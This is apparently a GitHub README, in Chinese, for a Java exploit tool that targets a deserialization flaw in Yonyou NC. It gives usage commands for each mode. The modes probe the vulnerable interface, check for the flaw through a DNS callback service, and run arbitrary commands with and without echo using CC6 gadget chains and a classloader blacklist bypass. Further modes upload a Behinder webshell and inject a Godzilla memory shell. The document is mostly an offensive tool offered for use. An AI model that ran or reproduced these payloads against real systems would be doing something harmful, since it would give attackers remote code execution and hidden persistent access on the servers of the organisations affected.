/YongyouNC-Unserialize-Tools

用友NC反序列化漏洞payload生成

Primary LanguageJava

使用说明

  1. 前言

无回显的构造链直接使用的是 CC6执行命令,回显的构造链使用了DefiningClassLoader来绕过默认的黑名单,然后结合 CC6构造链进行任意代码执行。

搭配了接口检测功能和URLDNS构造链判断是否存在反序列化。

  1. 接口检查功能:java -jar nc6.5.jar http://127.0.0.1 Check

image-20220830130453464

  1. URLDNS构造链探测:java -jar nc6.5.jar http://127.0.0.1 urldns http://123.dnslog.cn

image-20220830130719543

image-20220830130803567

image-20220830130825740

  1. 无回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 blind calc.exe

image-20220830131753990

image-20220830131804456

image-20220830131717673

  1. 回显命令执行:java -jar yonyouNCTools.jar http://192.168.222.130 Execute,通过 Header头传递命令。

image-20220830131939577

image-20220830142505411

  1. 落地 webshelljava -jar yonyouNCTools.jar http://192.168.222.130 UploadShell "C:\Users\Administrator\Pictures\Camera Roll\1.jsp"

此处如果使用 java1.8运行,固定落地一个天蝎的 webshell,路径为:http://127.0.0.1/eozZEwBb.jsp,如果使用的是 java1.7运行,会重新动态编译,可以落地自定义的 webshell,路径随机。

image-20220830132251387

image-20220830132618115

image-20220830132628494

image-20220830132824210

通过 java1.7落地自定义的 webshell,因为用到了动态编译,所有需要使用 jre下的 java.exe运行,否则动态编译失败。动态编译过程会提示使用了过时的 API,没有影响。

image-20220830133136817

image-20220830133235224

image-20220830133344521

image-20220830133403240

image-20220830133536619

  1. 注入内存马:java -jar yonyouNCTools.jar http://192.168.222.130 MemoryShell,注入的是一个 valve-Godzilla内存马。

image-20220830133637610

image-20220830133805235

image-20220830133847158

image-20220830134116523